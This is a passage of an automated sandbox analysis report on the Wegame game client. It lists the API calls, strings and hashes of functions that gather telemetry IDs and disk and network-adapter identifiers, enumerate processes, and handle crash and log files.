                                                                • ?set_ver@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABUversion_t@common@4@@Z.COMMON(00000000), ref: 004644CE
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000000), ref: 004644D3
                                                                • ?get_machine_id@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,00000000), ref: 004644DE
                                                                • ?set_machine_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(00000000,00000000), ref: 004644EB
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000000,00000000), ref: 004644FB
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                • ?set_qm_report_guid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046452E
                                                                  • Part of subcall function 00420C80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0043E0C9,85A35C35,?,?,?,00474220,000000FF,?,0043E01E,85A35C35,?,?,?,004741CF,000000FF), ref: 00420CC5
                                                                • ?set_machine_guid_async@Application@common@ierd_tgp@@SAXXZ.COMMON(?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046453E
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 00464543
                                                                • ?get_session_id@Application@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 00464550
                                                                • ?set_session_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046455C
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046456C
                                                                • ?get_client_id@util_client_info@ierd_tgp@@YAHXZ.COMMON(00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 00464573
                                                                • ?set_client_version_type@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXH@Z.COMMON(00000000,00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046457B
                                                                • ?GetLastLoginedUin@common@ierd_tgp@@YA_KXZ.COMMON(00000000,00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 00464580
                                                                  • Part of subcall function 00454452: __EH_prolog3_GS.LIBCMT ref: 00454459
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON ref: 004645A9
                                                                • ?set_uid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?), ref: 004645B4
                                                                • ?GetLastLoginedWegameId@common@ierd_tgp@@YAIXZ.COMMON(?), ref: 004645B9
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(?), ref: 004645C0
                                                                  • Part of subcall function 0046BFF0: __EH_prolog3.LIBCMT ref: 0046BFF7
                                                                • ?set_account_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(00000000,?), ref: 004645DA
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420F1B
                                                                  • Part of subcall function 00453FD5: __EH_prolog3_GS.LIBCMT ref: 00453FDC
                                                                  • Part of subcall function 00453FD5: ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,00000008,00000000,0000006C,00000000,bool __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0,?,00000008,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0), ref: 00453FFB
                                                                  • Part of subcall function 00453FD5: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(bool __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0,?,00000008,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0), ref: 00454007
                                                                  • Part of subcall function 00420E50: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00420F68
                                                                • ?get_exe_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?), ref: 0046467E
                                                                • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?), ref: 0046468E
                                                                  • Part of subcall function 0046C98B: __EH_prolog3.LIBCMT ref: 0046C992
                                                                  • Part of subcall function 0045DB69: __EH_prolog3_GS.LIBCMT ref: 0045DB70
                                                                  • Part of subcall function 0045DB69: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000050,004646AC,00000000,?,?), ref: 0045DBA0
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(?,?), ref: 004646DD
                                                                • ?set_channel_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABH@Z.COMMON(00000000), ref: 004646EB
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000000), ref: 004646F0
                                                                • ?set_bind_game_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXAB_K@Z.COMMON(?,00000000), ref: 0046470D
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAH@Z.COMMON(?,?,StartFor,00000008,?,00000000), ref: 00464745
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(StartFor,00000008,?,00000000), ref: 00464758
                                                                • ?SetStartForID@Qos@qos@adapt_for_imports@ierd_tgp@@QAEX_K@Z.COMMON(?,?,StartFor,00000008,?,00000000), ref: 00464768
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@D@std@@Qos@123@Qos@qos@adapt_for_imports@ierd_tgp@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@D@2@@std@@@$Application@common@ierd_tgp@@$H_prolog3__invalid_parameter_noinfo_noreturn$?get_log_instance@base@@H_prolog3LastLogger@1@Loginedmemmove$?extract_op_from_cmd@?get_cfg_by_path@common@ierd_tgp@@?get_client_id@util_client_info@ierd_tgp@@?get_exe_path_ex@?get_machine_id@?get_session_id@?parent_path@path@filesystem@ierd_tgp@@?set_account_id@?set_bind_game_id@?set_channel_id@?set_client_version_type@?set_machine_guid_async@?set_machine_id@?set_qm_report_guid@?set_qos_id@?set_session_id@?set_uid@?set_ver@D@2@@std@@@2@@property_tree@boost@@_Id@common@ierd_tgp@@StartSys_wrapper@common@ierd_tgp@@U?$less@Uin@common@ierd_tgp@@Uversion_t@common@4@@V123@V12@V?$basic_ptree@Vpath@filesystem@3@Wegame
                                                                • String ID: StartFor$initial.bind_by_game.channel_id$initial.bind_by_game.game_id
                                                                • API String ID: 767771055-1011178086
                                                                • Opcode ID: e11e7ac010909cbea9d3ef15fe5bf74d7624d6ca27fa02566f80c5a518846e0a
                                                                • Instruction ID: 83c608d1e361e4d1b910f0c236b3c569512478354f034213938e171b2ecb13bd
                                                                • Opcode Fuzzy Hash: e11e7ac010909cbea9d3ef15fe5bf74d7624d6ca27fa02566f80c5a518846e0a
                                                                • Instruction Fuzzy Hash: 37918671D00258DACB14FBBAC8557DDBBF46F14308F14849FE009B7282EB794B498B6A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0043E90C
                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000098), ref: 0043E927
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000098), ref: 0043E952
                                                                • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 0043E968
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,00000098), ref: 0043E97C
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\crashchecker.cpp,00000048,0048BBC7), ref: 0043E9BE
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,00000098), ref: 0043E9E4
                                                                • PathFileExistsW.SHLWAPI(?), ref: 0043EA82
                                                                • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000), ref: 0043EAB9
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000098), ref: 0043EAC6
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\crashchecker.cpp,0000005E,0048BBC7), ref: 0043EB08
                                                                • memset.VCRUNTIME140(?,00000000,00000010), ref: 0043EB3B
                                                                • ReadFile.KERNEL32(00000000,?,00000010,00000000,00000000), ref: 0043EB62
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0043EB6C
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0043EBBE
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\crashchecker.cpp,0000006A,0048BBC7), ref: 0043EBF8
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0043EC1E
                                                                • WriteFile.KERNEL32(00000000,00000000,00000010,?,00000000,?,?,?,?,?,?,?,?,00000098), ref: 0043ECC9
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,00000098), ref: 0043ECD3
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,00000098), ref: 0043ED25
                                                                • GetLocalTime.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000098), ref: 0043ECAC
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\crashchecker.cpp,00000082,0048BBC7,?,?,?,?,?,?,?,?,00000098), ref: 0043ED62
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000098), ref: 0043ED88
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@Logger@1@$File$ErrorLast$CreateExistsPath$?u16to8@common@ierd_tgp@@CloseD@2@@4@@D@std@@DirectoryH_prolog3H_prolog3_H_prolog3_catch_HandleLocalReadTimeU?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@std@@W@std@@Writememset
                                                                • String ID: Create cache dir(%s) failed, last_err=%d-%d$Create cache path success: %s.$Create new file fail: %d.$Flag$Last time: %.4d-%.2d-%.2d %.2d:%.2d:%.2d %.3d$Read last config success.$Read last time config fail: %d.$Write file failed: %d.$Write file success.$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\crashchecker.cpp
                                                                • API String ID: 1197986196-255517738
                                                                • Opcode ID: 960e3472e78fe95b3e3fe20fc1dd2878ae6317e47e3909f1ea8733977fe85653
                                                                • Instruction ID: d8ae56c32770d86ccc14e61a70e492bcf096f15184521587d6ae014e6521360a
                                                                • Opcode Fuzzy Hash: 960e3472e78fe95b3e3fe20fc1dd2878ae6317e47e3909f1ea8733977fe85653
                                                                • Instruction Fuzzy Hash: E2D1E470E01214ABEB11EB65CC56FEE7378AF18704F20405AF5457B2C2DBB85E45CBA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD84789
                                                                • memset.VCRUNTIME140(?,00000000,00000100,00000C68,6BD840C2,?,00000010,?), ref: 6BD847C3
                                                                • __snprintf_s.LIBCMT ref: 6BD847DC
                                                                • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000C68,6BD840C2,?,00000010,?), ref: 6BD847F5
                                                                • memset.VCRUNTIME140(?,00000000,0000000C), ref: 6BD84818
                                                                • memset.VCRUNTIME140(?,00000000,00000800,?,00000000,0000000C), ref: 6BD84838
                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000800,?,00000000), ref: 6BD84864
                                                                • memset.VCRUNTIME140(?,00000000,00000100,?,?,?,?,?,?,?,?,?,00000C68,6BD840C2,?,00000010), ref: 6BD84880
                                                                • memset.VCRUNTIME140(?,00000000,00000100,?,00000000,00000100,?,?,?,?,?,?,?,?,?,00000C68), ref: 6BD84893
                                                                • memset.VCRUNTIME140(?,00000000,00000100,?,00000000,00000100,?,00000000,00000100), ref: 6BD848A6
                                                                • isalnum.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,?), ref: 6BD84907
                                                                • isalnum.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BD8491C
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000C68,6BD840C2,?,00000010,?), ref: 6BD84A7A
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000C68,6BD840C2,?,00000010,?), ref: 6BD84A81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$isalnum$CloseControlCreateDeviceErrorFileH_prolog3_HandleLast__snprintf_s
                                                                • String ID: \\.\PhysicalDrive%d
                                                                • API String ID: 2535720194-2935326385
                                                                • Opcode ID: 6d346f42a3327966239afc539222e92835072964f6fb7852943f012c9e1f0277
                                                                • Instruction ID: d9d818ed5ae3e2dcf5e4ad0197ae648da7db8457e39cfa144c1c38b8b34745cd
                                                                • Opcode Fuzzy Hash: 6d346f42a3327966239afc539222e92835072964f6fb7852943f012c9e1f0277
                                                                • Instruction Fuzzy Hash: C7818CB1C0022DAAEB25DF74CC85FE9B77CAB05314F1046DAA518AB180EB759BC5CF20
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00463A44
                                                                • memset.VCRUNTIME140(?,00000000,00000208,000008D0,00464E9E,00000070,0045A152), ref: 00463A59
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00463A6F
                                                                • ?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?), ref: 00463A9B
                                                                  • Part of subcall function 0046C98B: __EH_prolog3.LIBCMT ref: 0046C992
                                                                • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,?,?), ref: 00463ACE
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                • memset.VCRUNTIME140(?,00000000,00000208,?,?,?,?,?), ref: 00463AFD
                                                                • FindFirstFileW.KERNEL32(?,?,?,00000000,00000208,?,?,?,?,?), ref: 00463B52
                                                                • memset.VCRUNTIME140(?,00000000,0000020A), ref: 00463B86
                                                                • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,?,00000104,?,00000000,0000020A), ref: 00463B9B
                                                                • wcsncat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,00481998,00000103), ref: 00463BAF
                                                                • DeleteFileW.KERNEL32(?), ref: 00463BC5
                                                                • MoveFileW.KERNEL32(?,?), ref: 00463BD5
                                                                • DeleteFileW.KERNEL32(?), ref: 00463BE2
                                                                • FindClose.KERNEL32(00000000), ref: 00463BE5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: File$memset$DeleteFindV123@$?filename@path@filesystem@ierd_tgp@@?parent_path@path@filesystem@ierd_tgp@@CloseFirstH_prolog3H_prolog3_ModuleMoveName_invalid_parameter_noinfo_noreturnwcsncat_swcsncpy_s
                                                                • String ID: %s\log\browser_%s.log
                                                                • API String ID: 1354867775-396427173
                                                                • Opcode ID: 0a79215ccf37d03d21c673cfb7e19c414d47187e4e7dfd6eef421c6a41388fb6
                                                                • Instruction ID: e219cd0dfdbe46c6697e9542d329f1db0db03a3874b284be62dbfa10aa16883a
                                                                • Opcode Fuzzy Hash: 0a79215ccf37d03d21c673cfb7e19c414d47187e4e7dfd6eef421c6a41388fb6
                                                                • Instruction Fuzzy Hash: D15123B1C0011C9ACB10EB61CD99BDE77BDEF54318F4041EAE109A3191EB396B99CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD8450D
                                                                • memset.VCRUNTIME140(?,00000000,00000100,000003B0,6BD84096,?,00000010,?), ref: 6BD84553
                                                                • __snprintf_s.LIBCMT ref: 6BD8456C
                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 6BD84589
                                                                • memset.VCRUNTIME140(?,00000000,00000018), ref: 6BD845AC
                                                                • DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 6BD845CD
                                                                • memset.VCRUNTIME140(?,00000000,00000021), ref: 6BD84601
                                                                • memset.VCRUNTIME140(?,00000000,00000210,?,00000000,00000021), ref: 6BD84614
                                                                • DeviceIoControl.KERNEL32(00000000,0007C088,?,00000020,?), ref: 6BD84680
                                                                  • Part of subcall function 6BD83FB0: __EH_prolog3.LIBCMT ref: 6BD83FB7
                                                                  • Part of subcall function 6BD0A3A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BD162D8,00000000,6BD16649,00000003,1F5A0D44,?,?,00000000,6BF764F4,000000FF,?,6BD15B05,00000000), ref: 6BD0A3E5
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 6BD8475D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$ControlDevice$ChangeCloseCreateFileFindH_prolog3H_prolog3_Notification__snprintf_s_invalid_parameter_noinfo_noreturn
                                                                • String ID: .$\\.\PhysicalDrive%d
                                                                • API String ID: 1363808082-636426351
                                                                • Opcode ID: 1db5c1b4609102fcc8482e70b06032008c2f0def7a51f90060ef27676206c3af
                                                                • Instruction ID: 632f481fd65a40f4318d87322fd8ef4a70b6b7cadc6578dee30eca5761565766
                                                                • Opcode Fuzzy Hash: 1db5c1b4609102fcc8482e70b06032008c2f0def7a51f90060ef27676206c3af
                                                                • Instruction Fuzzy Hash: A75181B1E4032CAFEB22CB60CC85FD9B77CAB16314F0005D9A658AB1D1D7745B848F61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0045DC7F
                                                                  • Part of subcall function 00461579: __EH_prolog3_GS.LIBCMT ref: 00461583
                                                                  • Part of subcall function 00461579: memset.VCRUNTIME140(?,00000000,00000208,00000214,0046A105,?,85A35C35,?,?,?,?,?,0047B8A9,000000FF), ref: 004615A6
                                                                  • Part of subcall function 00461579: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004615BB
                                                                  • Part of subcall function 00461579: PathRemoveFileSpecW.SHLWAPI(?), ref: 004615C8
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0045DCF9
                                                                • Process32First.KERNEL32(00000000,?), ref: 0045DD1B
                                                                • memset.VCRUNTIME140(?,00000000,00000410), ref: 0045DD2F
                                                                • OpenProcess.KERNEL32(00000411,00000000,?), ref: 0045DD52
                                                                • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 0045DD71
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045DDA8
                                                                • memset.VCRUNTIME140(?,00000000,00000208,?,?,?,?), ref: 0045DE0B
                                                                • _wsplitpath_s.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000000,00000000,00000000,00000000,?,00000104,00000000,00000000,?,00000000,00000208,?,?,?,?), ref: 0045DE39
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045DE74
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 0045DEE5
                                                                  • Part of subcall function 00462373: __EH_prolog3.LIBCMT ref: 0046237A
                                                                • Process32Next.KERNEL32(00000000,?), ref: 0045DF17
                                                                • CloseHandle.KERNEL32(00000000), ref: 0045DF25
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Filememset$CloseH_prolog3_ModuleNameProcess32SimpleString::operator=$ChangeCreateFindFirstH_prolog3HandleNextNotificationOpenPathProcessRemoveSnapshotSpecToolhelp32_wsplitpath_s
                                                                • String ID:
                                                                • API String ID: 1378268911-0
                                                                • Opcode ID: 7b92fbe5341bf65b4073f4c45463a53000b1b6774e7f6601c11e865c5fe56bf2
                                                                • Instruction ID: a50a9d05d8a7cb9146ee99b794bf15e6faab3b71f543bfa5a539bf8585c32850
                                                                • Opcode Fuzzy Hash: 7b92fbe5341bf65b4073f4c45463a53000b1b6774e7f6601c11e865c5fe56bf2
                                                                • Instruction Fuzzy Hash: CE711570D002289EDB60DF65CC85BDDB3B9EF98304F4001EAE50DA7181EB3A6A94CF55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memset.VCRUNTIME140(?,00000000,00000104,6C09F000,?,?,?,6BD84E35,?,?,?,6BD85FF9,?,?,00000000,00000006), ref: 6BD84E82
                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 6BD84E92
                                                                • PathAppendA.SHLWAPI(?,iphlpapi.dll), ref: 6BD84EA4
                                                                • LoadLibraryA.KERNEL32(?), ref: 6BD84EB1
                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 6BD84ED0
                                                                • GetAdaptersInfo.IPHLPAPI(?,?), ref: 6BD84EF6
                                                                • memset.VCRUNTIME140(?,00000000,00000006,?), ref: 6BD84F23
                                                                • FreeLibrary.KERNEL32(00000000), ref: 6BD84FA7
                                                                • memset.VCRUNTIME140(?,00000000,00000006), ref: 6BD84FB8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$Library$AdaptersAddressAppendDirectoryFreeInfoLoadPathProcSystem
                                                                • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                • API String ID: 3992280880-3114217049
                                                                • Opcode ID: d01add25d65550c1083369f168344c2ae2f4059360b97662f6da6c8307933cf9
                                                                • Instruction ID: fe4911ef632cb073b10e7a05b2c968b3c8366a87a21ecd65578cbbb75a2eefd6
                                                                • Opcode Fuzzy Hash: d01add25d65550c1083369f168344c2ae2f4059360b97662f6da6c8307933cf9
                                                                • Instruction Fuzzy Hash: 2A41D476906359ABCB20CB748C58BDABBBCAF15324F0004DDE59DA7241DB34EA85CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD840EF
                                                                • memset.VCRUNTIME140(?,00000000,00000100,00000394,6BD840AC,?,00000010,?), ref: 6BD84135
                                                                • __snprintf_s.LIBCMT ref: 6BD8414E
                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000394,6BD840AC,?,00000010,?), ref: 6BD8416B
                                                                • memset.VCRUNTIME140(?,00000000,0000022D,?,?,?,00000394,6BD840AC,?,00000010,?), ref: 6BD84192
                                                                • memmove.VCRUNTIME140(?,SCSIDISK), ref: 6BD841CD
                                                                • DeviceIoControl.KERNEL32(00000000,0004D008,?,0000003C,?,0000022D,?,00000000), ref: 6BD84200
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 6BD842DA
                                                                  • Part of subcall function 6BD83FB0: __EH_prolog3.LIBCMT ref: 6BD83FB7
                                                                  • Part of subcall function 6BD0A3A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BD162D8,00000000,6BD16649,00000003,1F5A0D44,?,?,00000000,6BF764F4,000000FF,?,6BD15B05,00000000), ref: 6BD0A3E5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$ChangeCloseControlCreateDeviceFileFindH_prolog3H_prolog3_Notification__snprintf_s_invalid_parameter_noinfo_noreturnmemmove
                                                                • String ID: SCSIDISK$\\.\Scsi%d:
                                                                • API String ID: 2312515712-2176293039
                                                                • Opcode ID: 409428cee620abf56cd98392bfaf51446b2cdb4849b336da494e9de4aadf2806
                                                                • Instruction ID: a72a03319149a4fd27fe42a0d7a722f3beeec2ea818a272937bc42ca4ec48470
                                                                • Opcode Fuzzy Hash: 409428cee620abf56cd98392bfaf51446b2cdb4849b336da494e9de4aadf2806
